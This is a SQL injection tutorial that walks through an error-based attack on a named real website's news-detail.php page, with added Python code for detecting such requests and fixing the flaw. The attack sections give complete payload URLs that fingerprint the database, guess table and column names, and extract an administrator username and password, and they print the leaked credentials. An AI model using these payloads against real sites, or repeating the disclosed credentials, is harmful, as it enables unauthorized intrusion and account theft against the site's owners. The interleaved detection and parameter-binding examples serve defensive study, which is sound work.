SQL INJECTION WHERE THE VERSION IS LESS THAN 5

Getting Version

Now, let's check the version with an error-based query:

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

Version: Duplicate entry '4.1.22-standard~1' for key 1
Getting Tables

This site doesn't have information_schema: the version is less than 5, so we have to guess the table names.

This should be our syntax to guess the tables:

or+1+group+by+concat_ws(0x7e,(select+1+from+Guess_table+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1

Now we have to guess the table name with this syntax. Some tables that usually contain login data:
- admin
- amdinstator
- tbl_admin
- tbl_adminstator
- login
- member
- user
- users
- table_users
- settings
Now I'm trying to guess the table name with the syntax.

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1

I tried to guess the admin table. There is no table in the database named admin, so an error came up:

Table 'uhd.admin' doesn't exist

Let's try to guess another table.

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1

Again an error came up. There is no table in the database named adminstator:

Table 'uhd.adminstator' doesn't exist

Let's try with another table:

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1

No error came up, so the users table exists:

Duplicate entry '1~1' for key 1
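Every request in the walkthrough so far has the same recognisable shape (a numeric id parameter carrying group by, concat_ws(0x7e, …), floor(rand(0)*2) and having min(0)), and every answer is read back from a MySQL error string that the application echoes to the visitor. The following Python script is an added example, not part of the paste, that flags both sides: it parses Common Log Format access-log lines, decodes the query string, checks that id is purely numeric, matches the request signatures, and classifies leaked "Duplicate entry", "Table ... doesn't exist" and "Unknown column" messages in response bodies. The log lines, IP addresses and the assumption that id must be an integer are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not taken from the site in the paste). The last
# two requests reuse the request shape the walkthrough above describes.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news-detail.php?id=312 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news-detail.php?id=312&page=2 HTTP/1.1" 200 4870
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1 HTTP/1.1" 500 612
198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1 HTTP/1.1" 500 598
"""

# Common Log Format; the request path is the token after the method.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Request-side signatures for the error-based technique used in the paste.
SIGNATURES = [
    ("groupby_floor_rand", re.compile(r"group\s+by\s+.*floor\s*\(\s*rand\s*\(", re.I)),
    ("having_min0", re.compile(r"having\s+min\s*\(\s*0\s*\)", re.I)),
    ("concat_ws_0x7e", re.compile(r"concat_ws\s*\(\s*0x7e", re.I)),
    ("subselect_in_param", re.compile(r"\(\s*select\s+", re.I)),
]

# Parameters this application expects to be plain integers (an assumption for the example).
NUMERIC_PARAMS = {"id"}

# Response-side signatures: MySQL error text that should never reach a client.
DB_ERROR_RE = {
    "duplicate_entry_oracle": re.compile(r"Duplicate entry '.*' for key"),
    "table_missing_oracle": re.compile(r"Table '.*' doesn't exist"),
    "column_missing_oracle": re.compile(r"Unknown column '.*' in '.*'"),
}


def analyze_request(path):
    """Return the names of every check that fires for one request path."""
    query = urlsplit(path).query
    findings = []
    # parse_qsl turns '+' into spaces and decodes %xx, so the regexes see plain SQL
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not value.strip().isdigit():
            findings.append(f"non_numeric_{name}")
        for sig, rx in SIGNATURES:
            if rx.search(value) and sig not in findings:
                findings.append(sig)
    return findings


def classify_db_error(body):
    """Return which leaked-error pattern a response body matches, or None."""
    for label, rx in DB_ERROR_RE.items():
        if rx.search(body):
            return label
    return None


def scan_log(text):
    """Parse CLF lines and return one alert dict per flagged request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m.group("path"))
        if findings:
            alerts.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "path": m.group("path"),
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["status"], ", ".join(alert["findings"]))
```

The non-numeric check is the most durable of the four: the function names in the signatures can be rewritten or obfuscated, but an id that is meant to be an integer and arrives as anything else is an anomaly regardless of payload. Pairing the request alerts with classify_db_error on the corresponding responses also tells you whether the application actually leaked the oracle the technique relies on.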
Getting Columns

Now we have to guess the column name. The syntax to get columns should be like this:

+or+1+group+by+concat_ws(0x7e,(select+column_name+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1

username is the most common column name. Let's try with it.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1

An error came up. The column doesn't exist :(

Unknown column 'username' in 'field list'

Let's try to guess another column, user_name.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1

Now the site loads fine. That means user_name exists.

Now try to guess the password column. Let's try with user_pass.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1
Extracting data from columns

To get data from columns, our syntax should be this:

or+1+group+by+concat_ws(0x7e,(select+concat(column_name,0x7e,column_name)+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1

Sometimes this query doesn't work, as it doesn't on this site. Then we have to use substring.

Getting Username:

http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)

With this subquery we can build a more complex query. It retrieves the value stored in the column a slice at a time: the substring function returns the leading characters of the query's result, starting at the first character, and the duplicate-entry error carries them back.

The username came up in the query:

Duplicate entry 'root~1' for key 1

Getting Password:

http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)

The password came up:

Duplicate entry 'trump123~1' for key 1
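The whole walkthrough works because news-detail.php concatenates the id parameter into the SQL text and then shows the database's own error message to the visitor. The following Python example, added here and not code from the paste or from the site, shows that unsafe pattern beside two fixes: binding the value as a query parameter, and additionally rejecting a non-integer id, inside a request handler that logs database errors server-side and returns only a generic message. SQLite stands in for MySQL, the table contents are constructed, and the tampered id string is a constructed stand-in with the same "or 1" shape as the requests above.

```python
import logging
import sqlite3

log = logging.getLogger("news")


def make_db():
    """In-memory stand-in for the site's news table; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(309, "Kitchen trends"), (312, "Garden ideas"), (315, "Lighting tips")],
    )
    return conn


def fetch_news_unsafe(conn, raw_id):
    """The root cause: the query-string value is pasted straight into the SQL text."""
    sql = "SELECT id, title FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def fetch_news_bound(conn, raw_id):
    """Parameter binding alone: the value travels as data and is never parsed as SQL."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (raw_id,)).fetchall()


def fetch_news_safe(conn, raw_id):
    """Binding plus type validation: a tampered id is rejected before any query runs."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (int(raw_id),)).fetchall()


def handle_request(conn, raw_id):
    """Handler shape that keeps database error text out of the HTTP response."""
    try:
        rows = fetch_news_safe(conn, raw_id)
    except ValueError:
        return 400, "Bad request"
    except sqlite3.Error as exc:
        log.error("news lookup failed: %s", exc)  # the detail stays in the server log
        return 500, "Internal error"
    if not rows:
        return 404, "Not found"
    return 200, rows[0][1]


if __name__ == "__main__":
    db = make_db()
    tampered = "312 or 1=1"  # constructed tampered id, same shape as the 'or 1' requests above
    print("unsafe  :", fetch_news_unsafe(db, tampered))   # every row comes back
    print("bound   :", fetch_news_bound(db, tampered))    # no row matches the literal string
    print("handler :", handle_request(db, tampered))      # rejected before the query runs
```

Binding on its own already stops the injection, because the database compares the column against the literal string rather than executing it; validating the type first is still worth doing, since it turns a tampered request into a 400 that is cheap to alert on and never reaches the database. Suppressing the raw error text removes the oracle that the error-based technique reads its answers from.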